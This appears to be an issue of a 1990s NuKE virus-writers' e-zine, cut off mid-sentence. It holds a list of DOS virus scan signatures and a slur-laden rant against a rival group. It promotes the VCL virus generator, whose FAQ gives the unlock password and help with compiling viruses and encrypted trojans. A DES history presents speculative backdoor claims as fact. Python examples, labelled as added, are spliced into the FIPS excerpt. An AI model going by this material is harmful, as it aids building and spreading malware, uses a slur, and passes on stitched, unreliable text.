[Ws]       Wordswap        fc40741b3d4230750c                              
[GY]       Got-you         8bf82eff2eb000cd                                
[D2]       DIR-2           04ffbb6000b44ae8                                
[Ein]      Einstein        8b1647008e1e4500b800                            
[Nbk]      Nobock          f88bef7451bb0001                                
[Jrk]      Jerk            e8f502e877009d5dbd00015533ed                    
[M128]     M-128           8ec0bf0303b17df3a4                              
[Boys]     Boys            ebd85b5383c307c607                              
[BT]       BackTime        e800005bbf00018db7                              
[Tokyo]    Tokyo           8ed0bc8c01fbb462                                
[Spain]    Spanish         e9fbfde9250b06570e07bf                          
[748]      748             8ed8813eac014642750881                          
[Spz]      Spanz           e800005e81ee0f018d                              
[Mant]     Manta           e814008aa42f058dbc20                            
[Twin]     Twin-351        b810ffcd213c077507e8                            
[Hitc]     Hitchcock       b430cd213c02720ab8fe4b                          
[Mosq]     Mosquito        b8080050eb055890eb3e                            
[ETC]      ETC             e91c02eb05e9d400908b16                          
[Kla]      Klaeren         5b81ebaf03b9a5038037                            
[D28]      Spanish April Fool 8ed08b261400fbc6063e                         
[CRJ]      Cracker         3a5222110a061945384129                          
[Bgh]      Burghofer       cd215b488ec0fa26c70601                          
[Dei]      Deicide         b95000ba0000cd26                                
[268P]     V270x           8ec10650be00015631ff                            
[1067]     1067            cd218a4403a202018a44                            
[337]      337             8c4402b425ba6001cd21                            
[WWT]      WWT             b44eb90100cd217302eb                            
[PCV]      PCV             b94f072e8a9708002e0010                          
[2559]     2559            ed07eb0190eb0190eb0190                          
[Drp]      Dropper         8bcdf3aa33edad91ad920a16                        
[Aust]     Australian      b87d4bcd213d545675                              
[144]      AT144           8bfee800005e83c631a4                            
[Kiev]     Kiev            8be9e800005b538b87                              
[733]      733             8b43018f06b95eff8f                              
[LC]       Love Child      f7b603fec5ebf14c6f76                            
[BB]       Bad Boy         2eff3627010e1f2eff262501                        
[PS10]     PrtSc           d8a113042d0200a31304061f                        
[1963]     1963            e8bb068ec033ff33c0af                            
[Grb]      Growing Block   eb83c3202e8e068500b44a                          
[Raub]     Raubkopi        fb8cc88ec0e804fbba3f01b4                        
[Z900]     ZK900           ea83c2042bdab44a8cc1418e                        
[BCV]      Sentinel        e583ec128c5ef455e816fe                          
[Spar]     Sparse          b8554bcd213d31127476b821                        
[Svir]     SVir            e82a0133c98a2e1a00e30dfe                        
[TV]       Tester          f3a4b409ba0301cd21baa1                          
[Staf]     Staf            e881ffb80030cd213dd207                          
[MX2]      Mix2            e83500e81b00ba0000b9e808                        
[453]      RPVS            8cc88ed8be01012e8b0405                          
[Guppy]    Guppy           8bd8cd21899c95008c84                            
[Crazy]    Eddie           8b46043bc374143d7000                            
[Ar]       834             e8ac02e87101e89e01e85502                        
[V299]     V-299           b80042cd21721a33d22e8b                          
[Pht]      Phantom         ea000183ee0603d6e8c8                            
[Lazy]     Lazy            b800008ec026a142002d                            
[Sylvia]   Sylvia          ebf781f9a3467503eb                              
[905]      905             f1cd2181fa0e0e7459ba                            
[Plg]      Plague          c3bb34018a27322606                              
[T133]     Tiny 133        a58ec1939191268785e0                            
[Pt]       Patient         b9b4052ea00a01bf2c012e803e09                    
[Hyb]      Hybrid          ea007497ab2780885d18d4                          
[LPC]      Pieces          ee3c00b82135cd212bdb26                          
[Sdm]      Saddam          a11304bb4000f7e32d67                            
[MG]       MG              a4c43e0600b0ea49f2ae                            
[S143]     Swiss 143       d6cd21803c5074178bd7e8                          
[Label]    Label           bf4c005733ed8eddc4                              
[HNY]      Happy N.Y.      e8f90373358dbcfc012e                            
[T133]     Tiny 133        bb2f06b950008bfed374                            
[Jus]      Justice         5b83eb592e89474d2e894f4e                        
[Hymn]     Hymn            5e83ee4cfc2e81bc4207                            
[Destr]    Destruct        e87dfc1e0e8e5e13c4                              
[U830]     USSR 830        5b83eb0383eb312e895f                            
[BeBe]     BeBe            0e8cc82e01060c01ea                              
[MGTU]     MGTU            e8b44e8d16030103d5cd21                          
[Data]     DataLock        ed2801be280101ee2e813c4d5a                      
[Lehigh]   Lehigh          5e83ee038bde81eb9101                            
[Dm2]      Doom II         3e0a014574052e033e0301                          
[Wisc]     Wisconsin       8b0e0601be08018a0434                            
[170X]     Cascade         31343124464c                                    
[Lisbon]   Lisbon          b41acd2106568e062c00bf00005e                    
[Vienna]   Violator        b42ac6069b050190e8d6ff81                        
[BMon]     Black Mon       25cd21a10a008ec0bb80                            
[Ont]      Ontario 2       562e8a84e801b9e801f6                            
[1024]     1024            2bc875ed8bd1b80042cd21                          
[RKO]      Rocko           8bc440b104d3e8408c                              
[Hal]      Hallo           8cd08bd4bc0200368b0e                            
[Paris]    Paris           21b43fb918008d1688028d3686028b1c                
[Syslock]  Syslock         3306140031044646e2f2                            
[Fish]     Fish            0e01cfe800005b81eba9                            
[Nom]      Nomen           51b9ffff9c0ee82e00599c                          
[2133]     Scott's         8bde909081c63200b912082e                        
[Oro]      Oropax          3e011df277d1ba00                                
[JoJo]     JoJo            4d2bd04a4503e8458ec5                            
[Dance]    Devil's         5e1e068cc0488ec026                              
[Tricks]   12 Tricks       640231944201d1c24e79f7                          
[Shake]    Shake           31d28bcacd213d00f073                            
[V800]     V800            51ad33d0e2fb59311547                            
[June16]   June            4da9a52e70662e57090f                            
[Taiwan]   Taiwan          8a0e950081e1fe00ba9e                            
[J13]      July 13th       1200b9b1042e300446e2                            
[1210]     1210            c474f02e803e2f040175                            
[Vcomm]    Vcomm           b92000b44ecd21730c                              
[VP]       VP              891e22038c062403b41abac6                        
[Jeru-A]   Jerusalem       f3a526c606fe03cb58                              
[C-J]      Japan           f581c60005803ce9                                
[XA1]      Christmas Tree  fa8bec5832c089460281                            
[Sorry]    Sorry           eb96832e120040832e03                            
[Rtiny]    Tiny            8bfa0e1fcd3257b04df2ae                          
[1381]     1381            c88ed8b840008ec0fce85804803e                    
[Ita]      ItaVir          b85845894002b000884004                          
[Liberty]  Liberty         e8fdfe722a3bc17c27e8                            
[Vacs]     Vacsina         b801438e5e0e8b56062e                            
[Wolf]     Wolf            8ec0b87725d3e326ff                              
[Flash]    Flash           b000fad50a8807eb05eac0                          
[Zero]     Zero            eb2b905a45cd602e                                
[A2]       AIDS II         a4005589e581ec0202bfca050e57bf3e01              
[fume]     Perfume         0406bfba0057cb0e1f8e06                          
[Joke]     Joker           5607450721071d49276d20736f206d7563              
[C-2B]     DC II-b         2e8a0732c2d0ca2e                                
[Not]      Nothing         720450eb0790b44c                                
[Dbase]    DBASE           80fc6c74ea80fc5b74e5                            
[Alabama]  Ala             8f061805268f061a                                
[Crime]    DC              36010183ee038bc63d00                            
[DC-2]     DC-2            8a9403018dbc29018d8cea06                        
[Ice]      MIX1            43813f455875f1b80043cd21                        
[SurivA]   Suriv A         735552495600                                    
[Yap]      Yap             e800005b81eb31012ef687                          
[2480]     Crew-2480       cd21b6008bc2b11ef6f13c                          
                                                                           
                        Screaming Radish/NuKE                              
===========================================================================
===========================================================================
A "Virus Group" or "Viral Warez?"                                          
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                          
                                                                           
As a long-time figure in the virus world, I cannot help but be disgusted   
by some of the upstart new "virus groups" that have been appearing in the  
last six months. These so-called virus writers are little more than warez
people who like to pass around viruses instead of pirated software. For
example, there's one Toronto-based group, who shall remain nameless,
which has its own couriers and ANSI makers. This is sickening. This
sweet-potato "virus group" consists of a bunch of geeks who get off on
mass-producing lame viruses, then typing up stupid .NFO files reminiscent
of INC and sending the package out around their local area. Too cheap      
to call long-distance, too lame to phreak, these scum are largely confined 
to Ontario, though they claim to have sites all over the world, which are, 
of course, PRI-VATE, making them conveniently hard to reach. A good thing, 
too, since these sites don't exist.                                        
                                                                           
Then these faggots create their "own" virus-generator using code ripped    
straight from PS-MPC and V.C.L. v1.0 (NOPed to defeat basic scanners), then
don't give credit where credit is due... This lame virus generator comes   
with a nice snazzy .NFO file with huge, dripping ASCII drawings of their   
group's name, nice boxes, credits, etc., straight out of an INC/TDT info   
file. Not only that, but this group can't even decide its own name, which
changes from virus to virus, from newsletter to newsletter. (Youth,        
youngsters, which is it?  Why not just change it to "14-year-olds?")       
The membership is also constantly changing. Most members don't do shit,    
while a few write tons of lame trojans and viruses so that they have       
something to brag about.                                                   
                                                                           
VGA artists? ANSI artists? What the fuck is this? Since when did a         
virus require a graphic? It seems as though the group can't decide whether 
it'll put out art or viruses...                                            
                                                                           
And what sort of virus group has couriers? Are their viruses so awful      
that they won't spread by themselves? Why do some members have personal    
LD couriers to call across town? (Too cheap to pay for local calls? When   
the split to 905 occurs they'll probably have to retire!) Why do they have 
couriers, period? Next thing you know they'll have full-time doc writers.  
Wait, they already do! I guess the people who run this group are too dead  
to think of their own shit so they have to hire others.                    
                                                                           
If we're all lucky, these people MAY go away soon, VIPER themselves        
into retirement. Of course there are always plenty of groups to rise up    
and take their place. There are groups that form and then break apart      
because no one knows how to program. There are those one-man groups of     
people who are too repulsive to get anyone to help them... I guess these   
groups serve one important function -- they make the real virus programmers
look that much better.  Thanks guys.                                       
                                                                           
                        Nowhere Man/NuKE                                   
===========================================================================
===========================================================================
VCL v2.0 Update                                                            
~~~~~~~~~~~~~~~                                                            
                                                                           
"What's happening with VCL v2.0?" is all we ever hear today. Well, making  
a product like VCL is not as easy as you may think! Let's compare.         
VCL offers the user unique user-configured viruses; if you want it to      
display a message, no problem; if you wish to add a routine, no problem.   
It's very flexible, unlike other virus generators. The others simply
consist of one generic virus and simply block out unneeded parts to
generate your virus. The options they give you are junk, like "Infect .COM"
or "Infect .EXE."  Please, we don't need that, you could just hack out a   
pre-existing virus if you want that.  VCL is much more complex.            
                                                                           
Nevertheless, we did it once with VCL v1.0, and we will continue to set the
standard with v2.0. The VCL kit is STILL undergoing construction. It will  
feature a similar user-friendly environment, but the viruses produced will 
be much better than before. The key word is STEALTH, v2.0 seeing the       
addition of TSR viruses with numerous stealth options, some never seen or  
tried before on a virus. Some of the new features of VCL v2.0 include:     
                                                                           
        o .COM, .EXE, .OVL, .SYS, and .BIN infection                       
        o Floppy boot sector infection for 360k, 1.2M, 720k, 1.44M, and    
          2.88M diskettes                                                  
        o MBR/partition infections for hard disks                          
        o Directory-entry infections (similar to Creeping Death)           
        o Incredible stealth capabilities                                  
        o Cryptex(C) encryption generation, with support for MtE and TPE   
        o The NuKE Encryption Device, a mutation engine by Nowhere Man     
          written for use with v2.0                                        
        o Anti-anti-virus options                                          
        o Improved anti-trace options                                      
        o Increased user control over virus creation (more options!)       
        o New effects and conditions                                       
        o Enhanced environment                                             
                                                                           
v2.0 will also differ from the initial release in that it is a team effort.
While v1.0 was entirely written by Nowhere Man, v2.0 is a complete NuKE    
collaboration; besides Nowhere Man, Rock Steady, Screaming Radish, TäLöN,  
and others will be working on the project. This allows us to expand VCL in 
ways that one man alone could not hope to do, a perfect example of the     
increasing cohesiveness of our group.                                      
                                                                           
So, when will v2.0 be completed? We can't say for certain. Already several 
deadlines have been broken, and we'd rather not promise any dates. All we  
can say with certainty is that it will be released before the end of the   
year. Keep a look out for it, and keep those suggestions coming!           
                                                                           
                                                                           
VCL v1.0 FAQ                                                               
~~~~~~~~~~~~                                                               
                                                                           
Nowhere Man has provided us with a list of frequently asked questions (and
their answers) concerning VCL v1.0, which we present here. He requests that
no more bug reports be made, as v2.0 is being rewritten from the ground up
and so should be free of the bugs in v1.0. Comments and suggestions are
still welcome, however.
                                                                           
                                                                           
Q: HeY d00d cAn U TeLL mE ThE PW FOR YouR VCL pRoGRAM?                     
                                                                           
A: VCL v1.0 was password-protected for this very reason: to keep lame fucks
   like this from using it. I gave out the password on every NuKE site, and
   relied upon word-of-mouth to spread it from there. All "good" boards    
   would probably get it. However, seeing as v1.0 is now becoming outdated,
   I've decided to be generous and tell the password to the world: it's    
   "Chiba City" (typed exactly as shown, capital Cs, lower-case otherwise).
   Please do not mail me (or anyone else) for the password, 'cause I'll    
   just delete the message. (For those who are interested, "Chiba City" was
   a random phrase taken from William Gibson's _Neuromancer_. There was    
   some conjecture on the nets a while ago as to what it meant. It's a city
   in Japan where much of the book's action takes place.)                  
                                                                           
                                                                           
Q: Why do you include an IDE (Integrated Development Environment)? I mean, 
   using an IDE is akin to a walking person intentionally crippling his own
   legs or a sighted person poking her own eyes out, right?                
                                                                           
A: Fuck off, Dark Angel. :-)                                               
                                                                           
                                                                           
Q: How come VCL doesn't install properly? I type in the password (Chiba    
   City), but it says I need to reinstall from an original copy, or it     
   hangs when creating VCL.CFG. I'm running with (whatever)...             
                                                                           
A: Ok, there can be several causes for this. First, VCL v1.0 will not work 
   with Stacker, SuperStor, or any other on-the-fly disk compressor. Sorry,
   but I was unaware of this problem for quite a while, since no one I know
   uses Stacker. Run it from an unStacked disk. The other problem could be 
   caused by a bad version of INSTALL.EXE, the installation program. I have
   released a new version of it under the name NEWINSTL.ZIP (some copies of
   VCL will have the new install included). If you don't already have it   
   and you can't install properly, try using the new version. If all else  
   fails, only install to C:\VCL, that should always work. Otherwise, your 
   problem is a corrupted .ZIP or a hacked/pre-installed copy of VCL. Use  
   only the original version.                                              
                                                                           
                                                                           
Q: Where's your source code, dude? I want to hack it so I can make my      
   "own" virus generator, but I can't seem to find it. Is it inside the    
   .EXE or something? Please help me soon, a new version of IVP is due     
   out next week! Also, why don't you include some ANSIs with VCL and      
   put in a .NFO file with elaborate ASCII setups, NoWhere Man?            
                                                                           
A: (Nowhere Man draws a gun, raises it to the head of the blithering,      
    fourteen-year-old Torontonian fashion-tragedy standing before him,     
    and pulls the trigger. KABLYAM!)                                       
                                                                           
    Seriously, the source code to VCL will not be released to the general
    public, it's for NuKE internal use only. Sorry. Nowhere Man will be    
    happy to answer any general questions as to the workings of the VCL    
    IDE/compiler, if you're wondering how it works.                        
                                                                           
                                                                           
Q: VCL won't compile my virus.  How come?                                  
                                                                           
A: There are several causes for this, too. First, you may not have your    
   assembler configured correctly (check it out from DOS, and be sure that 
   the Assembler string is set correctly), or you may not have an assembler
   at all. If your assembler normally works, it could be that you don't    
   have enough memory for the compiler (VCL shells out to run it, and it   
   itself uses 200k, so if you have low memory when starting VCL, your     
   assembler will have even less). Try removing TSRs, decreasing buffers,  
   etc. if this seems to be the case. Your assembler might not be truly
   MASM/TASM compatible, too. Specifically, A86 will not work with VCL     
   without user-modification of VCL-generated code. There is also the      
   chance that a routine that you've added has bad assembler code, causing 
   your assembler to abort, spoiling the process. There's also the very    
   remote chance that VCL has produced bad code (when there is low memory  
   a stray pointer sometimes causes VCL to go haywire and churn out bad    
   ASM code). If none of this seems to be the case, just Make .ASM and     
   assemble it yourself from DOS.                                          
                                                                           
                                                                           
Q: HELLO CAN I HELP WITH YOUR VIRUS MAKER? I NO BASIC GOOD AND I WILL      
   MAKE U AN ANSI 2 IF U GET ME SUM CC#S AND CODEZ AND DRIVE TO            
   INDIANA TO GET ME FIREWORKS!                                            
                                                                           
A: Go to hell, Suicidal Maniac!                                            
                                                                           
                                                                           
Q: I've written a virus and it seems to crash occasionally or give odd
   error messages. What's up?                                              
                                                                           
A: Do you have Anti-Tracing functions on? If so, turn them off. I made     
   a small mistake in the anti-trace code which can cause system crashes   
   under some conditions. It worked fine for me, but on some setups strange
   things can happen. If you don't have anti-tracing on, I'm afraid I can't
   help you...just look over the code (if you know assembler) and look for
   possible errors.                                                        
                                                                           
                                                                           
Q: Ok, I've written a trojan horse, but when I run it, it crashes. I've    
   compiled from DOS with...                                               
                                                                           
A: Ah ha, that's enough! As I stated in the on-line help, when using       
   encryption on a trojan horse, you *must* compile from the VCL IDE. If   
   for some reason you are compiling from DOS, TURN ENCRYPTION OFF. You    
   see, unlike viruses, which can start off unencrypted, trojans must be   
   encrypted from the start, since they only go off once and are sent      
   direct, not in infected files. For that reason, the general technique of
   having the initial encryption key be zero (used by almost all encrypted 
   viruses) won't work; VCL generates the encryption routine assuming the  
   trojan's already encrypted. When you compile from the IDE, VCL pre-     
   encrypts the trojan, so the encryption/decryption routine decrypts it at
   runtime. But when you compile from DOS, the trojan is unencrypted, so   
   when it's run, the routine *encrypts* the virus, causing it to crash    
   (the processor's trying to run useless code).                           
                                                                           
                                                                           
Q: HEY D00D I WANT TO HELP U WITH YOUR VIRUS CREATOR LAB NOW! WHAT DO      
   I DO FOR IT NE WAY? THANX L8R!!!                                        
                                                                           
A: Damn it, Suicidal Maniac, didn't you hear me the first time? FUCK OFF!  
                                                                           
                                                                           
Q: When I link my virus, it says "Warning: no stack." What's wrong?        
                                                                           
A: Absolutely nothing. The linker can give this message if it's generating 
   a .COM file (which all VCL executables are). It thinks there should be  
   a stack, but .COMs don't have built-in stacks, only .EXEs do. Be sure   
   to run EXE2BIN, however, as the linker outputs an .EXE file.
                                                                           
                        Nowhere Man and The NuKE Associates                
===========================================================================
===========================================================================
Data Encryption Standard (DES)                                             
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                             
                                                                           
The DES algorithm is a mathematical device, not an IC chip, computer system
or other piece of hardware. Several H/Pers have heard the buzzword
"DES Encryption" many times and yet few individuals seem to know what it
really means. Therefore, in my search to find out more about the IBM 9600
modems included with the IBM 4700s, I fell upon the need to know how DES
really worked, in order to learn about its fallbacks. Hopefully this will
answer many questions you have, as well as generate a few.
                                                                           
The Computer Age brought with it computer usage in banking and the         
financial institutions. Inevitably, computer crime came along with it.     
There arose the problem that, with sufficient knowledge and a computer     
terminal, one could transfer funds into his own account, make credit       
purchases on someone else's card, or even get money from a cash-dispensing 
machine.                                                                   
                                                                           
IBM quickly realized this and in the early 1970s set up a research group to
develop a suitable cipher code to protect data. In 1971, a code named      
LUCIFER was developed. It was sold to Lloyds of London for use with an     
IBM-developed cash-dispensing system.                                      
                                                                           
                                                                           
LUCIFER                                                                    
~~~~~~~                                                                    
Lucifer was successful but it had some weaknesses. IBM then spent about
three years refining and strengthening Lucifer. The code was analyzed over
and over by experts in cryptology. It withstood sophisticated
cryptanalytic attacks and, by 1974, it was ready to market. Around the
same time, the National Bureau of Standards (NBS), which since 1965 had
been responsible for developing standards for the purchase of computer
equipment by the Federal Government (USA), initiated a study of computer
security. The NBS saw a need for an encryption method, and solicited a
suitable encryption algorithm. This was done in May 1973, and August 1974. The
algorithm was to be for the storage and transmission of unclassified data. 
In response to this solicitation IBM submitted its Lucifer cipher. This    
cipher consisted of an extremely complex algorithm embedded in an IC       
structure. Basically the cipher key goes into a series of eight "S" boxes  
-- complex mathematical formulas that encrypt and decrypt data with the    
appropriate key. The initial Lucifer cipher had a 128-bit key. Before it   
submitted the cipher to NBS, IBM shortened it by removing more than half   
the key.                                                                   
                                                                           
                                                                           
NSA Participation                                                          
~~~~~~~~~~~~~~~~~                                                          
The National Security Agency (NSA), however, had taken an enormous interest
in Project Lucifer. It had lent IBM a hand in the development process and  
had helped to develop the S-box structures, as NSA needed to know the      
structure of Lucifer just in case they needed to decrypt data encoded with 
it. For years NSA had been dependent on international data communications. 
It monitored data communications, such as Middle East oil transactions and 
messages, and the financial and trade transactions from Latin America,
Europe, and the Far East. Also, military and diplomatic intelligence
(encrypted using crude techniques) was picked up and deciphered by NSA.
Thus, much information about Communist countries was obtained from non-    
communist countries. Now, the development of an economical, highly secure, 
data-encryption device threatened to cause NSA serious trouble. Also,      
outside researchers might stumble across some of NSA's methods.            
                                                                           
Meetings of NSA and IBM resulted in an agreement by IBM to reduce its key  
from 128 bits to 56 bits, and to classify certain details about their      
selection of the eight "S" boxes for the cipher. The National Bureau of    
Standards passed this cipher to NSA for analysis. The NSA certified the    
algorithm as "free" of any mathematical or statistical weaknesses and      
recommended it as the best candidate for the National Data Encryption      
Standard (DES). This suggestion was met with criticism. Was the cipher just
long enough to prevent corporate eavesdroppers from penetrating it, and    
just short enough for NSA's code breakers?! Was there a mathematical trick 
(CLASSIFIED) that would enable NSA to quickly break the code?              
                                                                           
The NSA had been tinkering with the critical "S" boxes, and it had         
therefore INSISTED that certain details were to be classified. The reason  
cited for this was simple: since the DES would be commercially available
and would be sold abroad as well, NSA would be hanging itself by permitting
the foreign use of an unbreakable cipher. The weaknesses designed into the 
cipher would still allow the agency to penetrate every communications      
channel and data bank using DES. The code breakers at NSA wanted to be sure
the NSA could break the cipher. As a result, a bureaucratic agreement was  
reached. The S-Box part of the cipher was strengthened (which is           
CLASSIFIED), and the key, which was dependent on the users of the code, was
weakened.
                                                                           
(Did NSA put a "Backdoor" into DES? The answer is normally YES! NSA had to 
have the upper-hand to all code encrypted with DES. If we go back a few    
months a movie was based on this topic. "Sneakers" raised several hints    
that DES had a backdoor.)                                                  
                                                                           
Computer "rumours" (well more like FACTS) say that it would be possible to 
build a computer using a million special "search chips" that could test a  
million possible solutions per second, and, therefore in 72,000 seconds    
(20 hours), all possible combinations could be tried. There would be a 50% 
probability that just 10 hours of trial-time would break the code          
(56-bits).                                                                 
                                                                           
What if the 128-bit key, the original Lucifer, had been submitted for      
consideration? Or did IBM submit the 128-bit key Lucifer but "reasoned"    
with the NSA for a 56-bit key? Nevertheless a 128-bit key provides         
34.03 x 10 ^ 37, or 34 followed by 37 zeros, combinations! This number     
is astronomical and incomprehensible to most people. If one TRILLION       
solutions per second were possible it would take a mere 34 x 10 ^ 25       
seconds or about 10,800,000,000,000,000,000 YEARS! And we are only rumoured
to know about the one-million possible solutions per second, not a trillion
as used in this example! Therefore IBM's Lucifer code (at present) is
probably unbreakable.                                                      
                                                                           
                                                                           
DES Becomes Accepted                                                       
~~~~~~~~~~~~~~~~~~~~                                                       
And on June 15, 1977, the Data Encryption Standard (DES) became the        
official civilian cipher of the U.S. government. It is now widely used in  
banking systems and other classified institutions.                         
                                                                           
To follow are a few clips from FIPS on DES, perhaps we can learn a tad from
this code and implement a rather crude manner of it into a virus? Undoubtedly
we will have all of Solomon's, McAfee's, Frisk's and others' horses and men
trying to "crack" the code, but will they succeed in doing so? There's only
one way to find out now? Right?                                            
                                                                           
                                                                           
Excerpts from the Data Encryption Standard                                 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                 
(From Federal Information Processing Standards (FIPS) publications 46, 74, 
and 81.)                                                                   
                                                                           
The Data Encryption Standard (DES) specifies an algorithm to be
implemented in electronic hardware devices and used for the cryptographic
protection of computer data. The publications concerning this standard
provide a complete description of a mathematical algorithm for encrypting
(enciphering) and decrypting (deciphering) binary-coded information.
Encrypting data converts the data to an unintelligible form called cipher.
Decrypting a cipher converts the data back to its original form. The
algorithm described in the standard specifies both enciphering and
deciphering operations which are based on a binary number called a key. The
key consists of 64 binary digits, of which 56 bits are used directly by the
algorithm and 8 bits are used for error detection (checksum).
                                                                           
Binary-coded data may be cryptographically protected using the DES         
algorithm in conjunction with a key. The key is generated in such a way
that each of the 56 bits used directly by the algorithm is random and the
8 error-detecting bits are set to make the parity of each 8-bit byte of the
key odd, i.e. there is an odd number of 1s in each 8-bit byte. Each member
of a group of authorized users of encrypted computer data must have the key
that was used to encipher the data in order to use the data. This key, held
by each member in common, is used to decipher any data received in cipher  
form from other members of the group. The encryption algorithm specified in
this standard is commonly known among those using the standard. The unique 
key chosen for use in a particular application makes the results of        
encrypting data, using the algorithm, unique. Selection of a different key 
causes the cipher, which is produced for any given set of inputs, to be    
different. The cryptographic security of the data depends on the security  
provided for the key that is used to encipher and decipher the data.       
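
An added example (not from the article or the FIPS text) of the key format
just described: it checks and sets odd parity on a 64-bit DES key and
extracts the 56 bits the algorithm uses. The parity bit is taken to be the
least significant bit of each byte, as in FIPS 46; the sample key and the
function names are constructed here.

```python
# Sample key constructed for this example; every byte has odd parity.
SAMPLE_KEY = bytes.fromhex("0123456789abcdef")


def parity_errors(key: bytes) -> list:
    """Return the indexes of key bytes that do NOT have odd parity."""
    if len(key) != 8:
        raise ValueError("a DES key is 64 bits (8 bytes) long")
    return [i for i, b in enumerate(key) if bin(b).count("1") % 2 == 0]


def set_odd_parity(key: bytes) -> bytes:
    """Keep the 7 key bits of each byte and recompute its parity bit."""
    if len(key) != 8:
        raise ValueError("a DES key is 64 bits (8 bytes) long")
    out = bytearray()
    for b in key:
        key_bits = b & 0xFE                      # upper 7 bits carry the key
        parity_bit = 1 if bin(key_bits).count("1") % 2 == 0 else 0
        out.append(key_bits | parity_bit)
    return bytes(out)


def effective_key(key: bytes) -> int:
    """The 56 bits the algorithm actually uses, packed into one integer."""
    value = 0
    for b in key:
        value = (value << 7) | (b >> 1)          # drop each parity bit
    return value


def flip_bits(key: bytes, index: int, mask: int) -> bytes:
    """Simulate corruption: XOR one key byte with a bit mask."""
    damaged = bytearray(key)
    damaged[index] ^= mask
    return bytes(damaged)


if __name__ == "__main__":
    print("sample key errors:      ", parity_errors(SAMPLE_KEY))
    print("one flipped bit:        ", parity_errors(flip_bits(SAMPLE_KEY, 3, 0x10)))
    print("two flipped bits:       ", parity_errors(flip_bits(SAMPLE_KEY, 3, 0x30)))
    # ASCII text used directly as a key loses the low bit of every character.
    print("'bbbbbbbb' == 'cccccccc':",
          effective_key(b"bbbbbbbb") == effective_key(b"cccccccc"))
```

Parity catches a single flipped bit in a key byte but not two in the same
byte, and any two 8-character ASCII strings that differ only in the low bit
of each character are the same DES key.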
                                                                           
Data can be recovered from a cipher only by using the exact same key that
was used to encipher it. Unauthorized recipients of the cipher, who know the
algorithm but do not have the correct key, cannot derive the original data
algorithmically. However, anyone who does have the key and the algorithm   
can easily decipher the cipher and obtain the original data. A standard    
algorithm, which is based on a secure key, thus provides a basis for       
exchanging encrypted computer data, by issuing the key that is used to     
encipher it only to those authorized to have the data. Additional Federal  
Information Processing Standards (FIPS) guidelines for implementing and    
using the DES are being developed and will be published by NBS.            
                                                                           
"Guidelines for Implementing and Using the NBS Data Encryption  Standard," 
 FIPS Publication 74.                                                      
                                                                           
NBS describes two different modes for using the algorithm described in this
standard. Blocks of data containing 64 bits may be directly entered into
the device where 64-bit cipher blocks are generated under control of the
key. This is called the "Electronic CodeBook" (ECB) mode. Alternatively, the
device may be used as a binary stream generator to produce statistically   
random binary bits, which are then combined with the clear (unencrypted)   
data (1 to 64 bits) using an "Exclusive OR" (XOR) logic operation. In order
to assure that the enciphering device and the deciphering device are       
synchronized their inputs are always set to the previous 64 bits of cipher 
that were transmitted or received. This second mode of using the encryption
algorithm is called the "Cipher FeedBack" (CFB) mode.                      
                                                                           
The Electronic CodeBook mode generates blocks of 64 cipher bits. The Cipher
Feedback mode generates a cipher having the same number of bits as the     
plain text. Each block of cipher is independent of all others when the     
Electronic CodeBook mode is used, while each byte (group of bits) of cipher
depends on the previous 64 cipher bits when the Cipher FeedBack mode is    
used.                                                                      
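
The two modes described above, as an added example (not part of the
original article or of the FIPS publications). A 4-round Feistel
construction built on HMAC-SHA256 stands in for DES so the block stays
short; that cipher, the key, the IV and the message are all constructed for
illustration, and the initial shift-register fill (IV) is an assumption the
excerpt does not mention.

```python
import hashlib
import hmac

BLOCK = 8  # bytes; DES works on 64-bit blocks


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def round_fn(key: bytes, rnd: int, half: bytes) -> bytes:
    # Round function of the stand-in cipher: 32 bits of HMAC-SHA256 output.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:4]


def encrypt_block(key: bytes, block: bytes) -> bytes:
    # Stand-in 64-bit block cipher (4-round Feistel). NOT DES and not secure;
    # it only supplies a keyed, invertible 64-bit mapping for the mode logic.
    left, right = block[:4], block[4:]
    for rnd in range(4):
        left, right = right, xor(left, round_fn(key, rnd, right))
    return left + right


def decrypt_block(key: bytes, block: bytes) -> bytes:
    # Undo the Feistel rounds in reverse order.
    left, right = block[:4], block[4:]
    for rnd in reversed(range(4)):
        left, right = xor(right, round_fn(key, rnd, left)), left
    return left + right


def ecb(key: bytes, data: bytes, decrypt: bool = False) -> bytes:
    # Electronic CodeBook: every 64-bit block is processed on its own.
    if len(data) % BLOCK:
        raise ValueError("ECB needs a whole number of 64-bit blocks")
    op = decrypt_block if decrypt else encrypt_block
    return b"".join(op(key, data[i:i + BLOCK])
                    for i in range(0, len(data), BLOCK))


def cfb8(key: bytes, iv: bytes, data: bytes, decrypt: bool = False) -> bytes:
    # 8-bit Cipher FeedBack: the cipher input is a shift register holding the
    # previous 64 bits of cipher; one output byte is XORed with each data
    # byte. Both directions use encrypt_block only.
    reg, out = iv, bytearray()
    for byte in data:
        result = byte ^ encrypt_block(key, reg)[0]
        out.append(result)
        cipher_byte = byte if decrypt else result
        reg = reg[1:] + bytes([cipher_byte])     # shift in the cipher byte
    return bytes(out)


def blocks(data: bytes) -> list:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def damaged_bytes(original: bytes, recovered: bytes) -> list:
    # Positions where the recovered text differs from the original.
    return [i for i, (a, b) in enumerate(zip(original, recovered)) if a != b]


# Constructed sample values (not from the article).
KEY = bytes.fromhex("0123456789abcdef")
IV = bytes.fromhex("1122334455667788")
MESSAGE = b"PAY 100 " * 3 + b"TO BOB"   # 30 bytes, three identical blocks

if __name__ == "__main__":
    print("ECB blocks:", [b.hex() for b in blocks(ecb(KEY, MESSAGE[:24]))])
    cfb_ct = cfb8(KEY, IV, MESSAGE)
    print("CFB blocks:", [b.hex() for b in blocks(cfb_ct)])
    tampered = bytearray(cfb_ct)
    tampered[5] ^= 0x01                          # one bit damaged in transit
    recovered = cfb8(KEY, IV, bytes(tampered), decrypt=True)
    print("CFB bytes damaged by one flipped bit:",
          damaged_bytes(MESSAGE, recovered))
```

Run it and the three ECB blocks print identical, which is how ECB leaks
repeated plaintext, while the CFB blocks differ. A single flipped cipher bit
in CFB damages at most nine bytes of recovered text before the shift
register refills and the stream resynchronizes.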
                                                                           
The cryptographic algorithm specified in this standard transforms a 64-bit
binary value into a unique 64-bit binary value based on a 56-bit variable.
If the complete 64-bit input is used (i.e., none of the input bits should be
